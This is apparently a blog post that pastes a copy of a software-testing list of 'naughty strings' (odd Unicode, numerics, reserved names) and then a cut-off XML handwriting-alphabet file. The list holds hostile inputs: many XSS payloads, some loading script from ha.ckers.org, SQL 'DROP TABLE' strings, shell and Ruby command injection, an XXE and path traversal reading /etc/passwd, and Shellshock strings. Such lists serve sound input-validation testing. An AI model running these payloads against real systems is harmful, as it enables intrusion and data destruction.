Text
Explanation
So a while back I was messing around on the computer, and I wanted to make an AI. A whole bunch happened but this is what I’ve got. I did not write any of it..
1 note
·
View note
Text
# Reserved Strings # # Strings which may be used elsewhere in code
undefined undef null NULL (null) nil NIL true false True False None \ \
# Numeric Strings # # Strings which can be interpreted as numeric
0 1 1.00 $1.00 ½ 1E2 1E02 1E+02 -1 -1.00 -$1.00 -½ -1E2 -1E02 -1E+02 1/0 0/0 -2147483648/-1 -9223372036854775808/-1 0.00 0..0 . 0.0.0 0,00 0,,0 , 0,0,0 0.0/0 1.0/0.0 0.0/0.0 1,0/0,0 0,0/0,0 –1 - -. -, 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 NaN Infinity -Infinity INF 1#INF -1#IND 1#QNAN 1#SNAN 1#IND 0x0 0xffffffff 0xffffffffffffffff 0xabad1dea 123456789012345678901234567890123456789 1,000.00 1 000.00 1'000.00 1,000,000.00 1 000 000.00 1'000'000.00 1.000,00 1 000,00 1'000,00 1.000.000,00 1 000 000,00 1'000'000,00 01000 08 09 2.2250738585072011e-308
# Special Characters # # Strings which contain common special ASCII characters (may need to be escaped)
,./;’[]-= <>?:“{}|_+ !@#$%^&*()`~
# Unicode Symbols # # Strings which contain common unicode symbols (e.g. smart quotes)
Ω≈ç√∫˜µ≤≥÷ åß∂ƒ©˙∆˚¬…æ œ∑´®†¥¨ˆøπ“‘ ¡™£¢∞§¶•ªº–≠ ¸˛Ç◊ı˜Â¯˘¿ ÅÍÎÏ˝ÓÔÒÚÆ☃ Œ„´‰ˇÁ¨ˆØ∏”’ `⁄€‹›fifl‡°·‚—± ⅛⅜⅝⅞ ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя ٠١٢٣٤٥٦٧٨٩
# Unicode Subscript/Superscript # # Strings which contain unicode subscripts/superscripts; can cause rendering issues
⁰⁴⁵ ₀₁₂ ⁰⁴⁵₀₁₂
# Quotation Marks # # Strings which contain misplaced quotation marks; can cause encoding errors
’ ” “ ”“ ’”’ “”“”’“ ”’“’”“”“ <foo val=“bar” /> <foo val=“bar” /> <foo val=”bar“ /> <foo val=`bar’ />
# Two-Byte Characters # # Strings which contain two-byte characters: can cause rendering issues or character-length issues
“c’†‚³‚ٌ‚ة‚ ‚°‚ؤ‰؛‚³‚¢ ƒpپ[ƒeƒBپ[‚ضچs‚©‚ب‚¢‚© کaگ»ٹ؟Œê •”—ژٹi »çب¸°ْاذ؟ّ ¾îاذ؟¬±¸¼ز ھBآ÷¸¦ إ¸°ي ؟آ ¼„½أ¸ا°ْ œ؛´ظ¸® Œc¹و°¢اد قنüهخ،ùتêآهقùت研د¼ل¶ ؟ï¶ُ¹ظإن¸£ 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
# Japanese Emoticons # # Strings which consists of Japanese-style emoticons which are popular on the web
پR༼ຈل͜ຈ༽ة پR༼ຈل͜ຈ༽ة (،◕ پح ◕،) پM¨(´∀پMپ؟ __غ(,_,*) پE(پPپحپP)پE:*: ك¥✿پS╲(،◕‿◕،)╱✿¥ك ,پBپE:*:پEپK’( ☻ ω ☻ )پBپE:*:پEپK’ (╯°□°)╯︵ ┻━┻) (ةಥ‰vಥپjة „³„ھ„³ ( ͡° ͜ʖ ͡°)
# Emoji # # Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
😍 👩🏽 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 🐵 🙈 🙉 🙊 ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
# Unicode Numbers # # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
123 ١٢٣
# Right-To-Left Strings # # Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ הָיְתָהtestالصفحات التّحول ﷽ ﷺ
# Unicode Spaces # # Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html)
،، ␣ ␢ ␡
# Trick Unicode # # Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
test test
test
testtest test
# Zalgo Text # # Strings which contain "corrupted” text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔ل̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞��̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
# Unicode Upsidedown # # Strings which contain unicode with an “upsidedown” effect (via http://www.upsidedowntext.com)
ےɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs ‘ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ 00ےƖ$-
# Unicode font # # Strings which contain bold/italic/etc. versions of normal characters
£ش£è£ه £ٌ£ُ£é£م£ë £â£ٍ£ï£÷£î £و£ï£ّ £ê£ُ£ي£ً£َ £ï£ِ£ه£ٍ £ô£è£ه £ى£ل£ْ£ù £ن£ï£ç 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 ⒯⒣⒠ ©ف©ل©ص©د©× ©خ©ق©غ©م©ع ©ز©غ©ن ©ض©ل©ظ©ـ©ك ©غ©â©ر©ق ©à©ش©ر ©ط©ح©و©ه ©ذ©غ©س
# Script Injection # # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
<script>alert(123)</script> <script>alert('123');</script> <img src=x onerror=alert(123) /> <svg><script>123<1>alert(123)</script> “><script>alert(123)</script> ’><script>alert(123)</script> ><script>alert(123)</script> </script><script>alert(123)</script> < / script >< script >alert(123)< / script > onfocus=JaVaSCript:alert(123) autofocus ” onfocus=JaVaSCript:alert(123) autofocus ’ onfocus=JaVaSCript:alert(123) autofocus £¼script£¾alert(123)£¼/script£¾ <sc<script>ript>alert(123)</sc</script>ript> –><script>alert(123)</script> “;alert(123);t=” ’;alert(123);t=’ JavaSCript:alert(123) ;alert(123); src=JaVaSCript:prompt(132) “><script>alert(123);</script x=” ’><script>alert(123);</script x=’ ><script>alert(123);</script x= “ autofocus onkeyup="javascript:alert(123) ’ autofocus onkeyup='javascript:alert(123) <script\x20type="text/javascript”>javascript:alert(1);</script> <script\x3Etype=“text/javascript”>javascript:alert(1);</script> <script\x0Dtype=“text/javascript”>javascript:alert(1);</script> <script\x09type=“text/javascript”>javascript:alert(1);</script> <script\x0Ctype=“text/javascript”>javascript:alert(1);</script> <script\x2Ftype=“text/javascript”>javascript:alert(1);</script> <script\x0Atype=“text/javascript”>javascript:alert(1);</script> ’`“><\x3Cscript>javascript:alert(1)</script> ’`”><\x00script>javascript:alert(1)</script> ABC<div style=“x\x3Aexpression(javascript:alert(1)”>DEF ABC<div style=“x:expression\x5C(javascript:alert(1)”>DEF ABC<div style=“x:expression\x00(javascript:alert(1)”>DEF ABC<div style=“x:exp\x00ression(javascript:alert(1)”>DEF ABC<div style=“x:exp\x5Cression(javascript:alert(1)”>DEF ABC<div style=“x:\x0Aexpression(javascript:alert(1)”>DEF ABC<div style=“x:\x09expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE3\x80\x80expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x84expression(javascript:alert(1)”>DEF ABC<div style=“x:\xC2\xA0expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x80expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x8Aexpression(javascript:alert(1)”>DEF ABC<div style=“x:\x0Dexpression(javascript:alert(1)”>DEF ABC<div style=“x:\x0Cexpression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x87expression(javascript:alert(1)”>DEF ABC<div style=“x:\xEF\xBB\xBFexpression(javascript:alert(1)”>DEF ABC<div style=“x:\x20expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x88expression(javascript:alert(1)”>DEF ABC<div style=“x:\x00expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x8Bexpression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x86expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x85expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x82expression(javascript:alert(1)”>DEF ABC<div style=“x:\x0Bexpression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x81expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x83expression(javascript:alert(1)”>DEF ABC<div style=“x:\xE2\x80\x89expression(javascript:alert(1)”>DEF <a href=“\x0Bjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x0Fjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xC2\xA0javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x05javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE1\xA0\x8Ejavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x18javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x11javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x88javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x89javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x80javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x17javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x03javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x0Ejavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x1Ajavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x00javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x10javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x82javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x20javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x13javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x09javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x8Ajavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x14javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x19javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\xAFjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x1Fjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x81javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x1Djavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x87javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x07javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE1\x9A\x80javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x83javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x04javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x01javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x08javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x84javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x86javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE3\x80\x80javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x12javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x0Djavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x0Ajavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x0Cjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x15javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\xA8javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x16javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x02javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x1Bjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x06javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\xA9javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x80\x85javascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x1Ejavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\xE2\x81\x9Fjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“\x1Cjavascript:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“javascript\x00:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“javascript\x3A:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“javascript\x09:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“javascript\x0D:javascript:alert(1)” id=“fuzzelement1”>test</a> <a href=“javascript\x0A:javascript:alert(1)” id=“fuzzelement1”>test</a> `“’><img src=xxx:x \x0Aonerror=javascript:alert(1)> `”’><img src=xxx:x \x22onerror=javascript:alert(1)> `“’><img src=xxx:x \x0Bonerror=javascript:alert(1)> `”’><img src=xxx:x \x0Donerror=javascript:alert(1)> `“’><img src=xxx:x \x2Fonerror=javascript:alert(1)> `”’><img src=xxx:x \x09onerror=javascript:alert(1)> `“’><img src=xxx:x \x0Conerror=javascript:alert(1)> `”’><img src=xxx:x \x00onerror=javascript:alert(1)> `“’><img src=xxx:x \x27onerror=javascript:alert(1)> `”’><img src=xxx:x \x20onerror=javascript:alert(1)> “`’><script>\x3Bjavascript:alert(1)</script> ”`’><script>\x0Djavascript:alert(1)</script> “`’><script>\xEF\xBB\xBFjavascript:alert(1)</script> ”`’><script>\xE2\x80\x81javascript:alert(1)</script> “`’><script>\xE2\x80\x84javascript:alert(1)</script> ”`’><script>\xE3\x80\x80javascript:alert(1)</script> “`’><script>\x09javascript:alert(1)</script> ”`’><script>\xE2\x80\x89javascript:alert(1)</script> “`’><script>\xE2\x80\x85javascript:alert(1)</script> ”`’><script>\xE2\x80\x88javascript:alert(1)</script> “`’><script>\x00javascript:alert(1)</script> ”`’><script>\xE2\x80\xA8javascript:alert(1)</script> “`’><script>\xE2\x80\x8Ajavascript:alert(1)</script> ”`’><script>\xE1\x9A\x80javascript:alert(1)</script> “`’><script>\x0Cjavascript:alert(1)</script> ”`’><script>\x2Bjavascript:alert(1)</script> “`’><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> ”`’><script>-javascript:alert(1)</script> “`’><script>\x0Ajavascript:alert(1)</script> ”`’><script>\xE2\x80\xAFjavascript:alert(1)</script> “`’><script>\x7Ejavascript:alert(1)</script> ”`’><script>\xE2\x80\x87javascript:alert(1)</script> “`’><script>\xE2\x81\x9Fjavascript:alert(1)</script> ”`’><script>\xE2\x80\xA9javascript:alert(1)</script> “`’><script>\xC2\x85javascript:alert(1)</script> ”`’><script>\xEF\xBF\xAEjavascript:alert(1)</script> “`’><script>\xE2\x80\x83javascript:alert(1)</script> ”`’><script>\xE2\x80\x8Bjavascript:alert(1)</script> “`’><script>\xEF\xBF\xBEjavascript:alert(1)</script> ”`’><script>\xE2\x80\x80javascript:alert(1)</script> “`’><script>\x21javascript:alert(1)</script> ”`’><script>\xE2\x80\x82javascript:alert(1)</script> “`’><script>\xE2\x80\x86javascript:alert(1)</script> ”`’><script>\xE1\xA0\x8Ejavascript:alert(1)</script> “`’><script>\x0Bjavascript:alert(1)</script> ”`’><script>\x20javascript:alert(1)</script> “`’><script>\xC2\xA0javascript:alert(1)</script> <img \x00src=x onerror="alert(1)”> <img \x47src=x onerror=“javascript:alert(1)”> <img \x11src=x onerror=“javascript:alert(1)”> <img \x12src=x onerror=“javascript:alert(1)”> <img\x47src=x onerror=“javascript:alert(1)”> <img\x10src=x onerror=“javascript:alert(1)”> <img\x13src=x onerror=“javascript:alert(1)”> <img\x32src=x onerror=“javascript:alert(1)”> <img\x47src=x onerror=“javascript:alert(1)”> <img\x11src=x onerror=“javascript:alert(1)”> <img \x47src=x onerror=“javascript:alert(1)”> <img \x34src=x onerror=“javascript:alert(1)”> <img \x39src=x onerror=“javascript:alert(1)”> <img \x00src=x onerror=“javascript:alert(1)”> <img src\x09=x onerror=“javascript:alert(1)”> <img src\x10=x onerror=“javascript:alert(1)”> <img src\x13=x onerror=“javascript:alert(1)”> <img src\x32=x onerror=“javascript:alert(1)”> <img src\x12=x onerror=“javascript:alert(1)”> <img src\x11=x onerror=“javascript:alert(1)”> <img src\x00=x onerror=“javascript:alert(1)”> <img src\x47=x onerror=“javascript:alert(1)”> <img src=x\x09onerror=“javascript:alert(1)”> <img src=x\x10onerror=“javascript:alert(1)”> <img src=x\x11onerror=“javascript:alert(1)”> <img src=x\x12onerror=“javascript:alert(1)”> <img src=x\x13onerror=“javascript:alert(1)”> <img[a][b][c]src[d]=x[e]onerror=[f]“alert(1)”> <img src=x onerror=\x09"javascript:alert(1)“> <img src=x onerror=\x10"javascript:alert(1)”> <img src=x onerror=\x11"javascript:alert(1)“> <img src=x onerror=\x12"javascript:alert(1)”> <img src=x onerror=\x32"javascript:alert(1)“> <img src=x onerror=\x00"javascript:alert(1)”> <a href=javascript:javascript:alert(1)>XXX</a> <img src=“x` `<script>javascript:alert(1)</script>”` `> <img src onerror /“ ’”= alt=javascript:alert(1)//“> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=x:x onerror=javascript:alert(1)></a>“> <!–[if]><script>javascript:alert(1)</script –> <!–[if<img src=x onerror=javascript:alert(1)//]> –> <script src=”/\%(jscript)s"></script> <script src=“\%(jscript)s”></script> <IMG “”“><SCRIPT>alert("XSS”)</SCRIPT>“> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs’)”> <IMG SRC= onmouseover=“alert('xxs’)”> <IMG onmouseover=“alert('xxs’)”> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=“jav ascript:alert('XSS’);”> <IMG SRC=“jav ascript:alert('XSS’);”> <IMG SRC=“javascript:alert('XSS’);”> <IMG SRC=“javascript:alert('XSS’);”> perl -e 'print “<IMG SRC=java\0script:alert("XSS")>”;’ > out <IMG SRC=“  javascript:alert('XSS’);”> <SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> <SCRIPT/SRC=“http://ha.ckers.org/xss.js”></SCRIPT> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC=“javascript:alert('XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < ";alert('XSS’);// <plaintext> http://a/%%30%30
# SQL Injection # # Strings which can cause a SQL injection if inputs are not sanitized
1;DROP TABLE users 1’; DROP TABLE users– 1 ’ OR 1=1 – 1 ’ OR '1’='1
% _
# Server Code Injection # # Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
- – –version –help $USER /dev/null; touch /tmp/blns.fail ; echo `touch /tmp/blns.fail` $(touch /tmp/blns.fail) @{[system “touch /tmp/blns.fail”]}
# Command Injection (Ruby) # # Strings which can call system commands within Ruby/Rails applications
eval(“puts 'hello world’”) System(“ls -al /”) `ls -al /` Kernel.exec(“ls -al /”) Kernel.exit(1) %x('ls -al /’)
# XXE Injection (XML) # # String which can reveal system files when parsed by a badly configured XML parser
<?xml version=“1.0” encoding=“ISO-8859-1”?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM “file:///etc/passwd” >]><foo>&xxe;</foo>
# Unwanted Interpolation # # Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
$HOME $ENV{'HOME’} %d %s {0} %*.*s
# File Inclusion # # Strings which can cause user to pull in files that should not be a part of a web server
../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../etc/hosts
# Known CVEs and Vulnerabilities # # Strings that test for known vulnerabilities
() { 0; }; touch /tmp/blns.shellshock1.fail; () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
# MSDOS/Windows Special Filenames # # Strings which are reserved characters in MSDOS/Windows
CON PRN AUX CLOCK$ NUL A: ZZ: COM1 LPT1 LPT2 LPT3 COM2 COM3 COM4
# Scunthorpe Problem # # Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
Scunthorpe General Hospital Penistone Community Church Lightwater Country Park Jimmy Clitheroe Horniman Museum shitake mushrooms RomansInSussex.co.uk http://www.cum.qc.ca/ Craig Cockburn, Software Specialist Linda Callahan Dr. Herman I. Libshitz magna cum laude Super Bowl XXX medieval erection of parapets evaluate mocha expression Arsenal canal classic Tyson Gay basement
# Human injection # # Strings which may cause human to reinterpret worldview
If you’re reading this, you’ve been in a coma for almost 20 years now. We’re trying a new technique. We don’t know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
# Terminal escape codes # # Strings which punish the fools who use cat/type on this file
Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue But now…[20Cfor my greatest trick…[8m The quick brown fo x… [Beeeep]
# iOS Vulnerability # # Strings which crashed iMessage in iOS versions 8.3 and earlier
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣبك
<?xml version=“1.0” encoding=“UTF-8”?><alphabetFile xsi:schemaLocation=“urn:schemas-microsoft-com:tabletpc:alphabet.v1 Alphabet.xsd” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns=“urn:schemas-microsoft-com:tabletpc:alphabet.v1”><trainer family=“latin” comment=“Dutch - All” id=“19”><symbol id=“A” confusables=“atÂ*”/><symbol id=“Á” confusables=“ÄÂÀA”/><symbol id=“À” confusables=“ÂÄàÁ”/><symbol id=“” confusables=“ÀâÁÄ”/><symbol id=“Ä” confusables=“ÀÁÂä”/><symbol id=“B” confusables=“bD31”/><symbol id=“C” confusables=“c([e”/><symbol id=“Ç” confusables=“çG§E”/><symbol id=“D” confusables=“dBPb”/><symbol id=“E” confusables=“eFÉt”/><symbol id=“É” confusables=“ÊËEÈ”/><symbol id=“È” confusables=“ÉÊËE”/><symbol id=“Ê” confusables=“ÈÉEê”/><symbol id=“Ë” confusables=“ÈÉëÊ”/><symbol id=“F” confusables=“fIE±”/><symbol id=“G” confusables=“gÇ6E”/><symbol id=“H” confusables=“htN#”/><symbol id=“I” confusables=“l1/i”/><symbol id=“Í” confusables=“íiÏI”/><symbol id=“Δ confusables=“îiÍT”/><symbol id=“Ï” confusables=“ïiÍI”/><symbol id=“J” confusables=“Ij]3”/><symbol id=“K” confusables=“kRHr”/><symbol id=“L” confusables=“l<2h”/><symbol id=“M” confusables=“mNnH”/><symbol id=“N” confusables=“nMwW”/><symbol id=“O” confusables=“0o°Ó”/><symbol id=“Ó” confusables=“óÖöo”/><symbol id=“Ö” confusables=“ö°Óó”/><symbol id=“P” confusables=“pDBT”/><symbol id=“Q” confusables=“qOo°”/><symbol id=“R” confusables=“rKkN”/><symbol id=“S” confusables=“s5g$”/><symbol id=“T” confusables=“t+±F”/><symbol id=“U” confusables=“u4vK”/><symbol id=“Ú” confusables=“úÜÛü”/><symbol id=“Û” confusables=“ûúÚü”/><symbol id=“Ü” confusables=“üÛäÚ”/><symbol id=“V” confusables=“vruU”/><symbol id=“W” confusables=“wnuN”/><symbol id=“X” confusables=“x*t+”/><symbol id=“Y” confusables=“y¥4x”/><symbol id=“Z” confusables=“z2ra”/><symbol id=“a” confusables=“Aádq”/><symbol id=“á” confusables=“àäâÁ”/><symbol id=“à” confusables=“âäÀ°”/><symbol id=“â” confusables=“àÂä°”/><symbol id=“ä” confusables=“Äà°ö”/><symbol id=“b” confusables=“lBf5”/><symbol id=“c” confusables=“C(e<”/><symbol id=“ç” confusables=“ǧGE”/><symbol id=“d” confusables=“aA8&”/><symbol id=“e” confusables=“éclè”/><symbol id=“é” 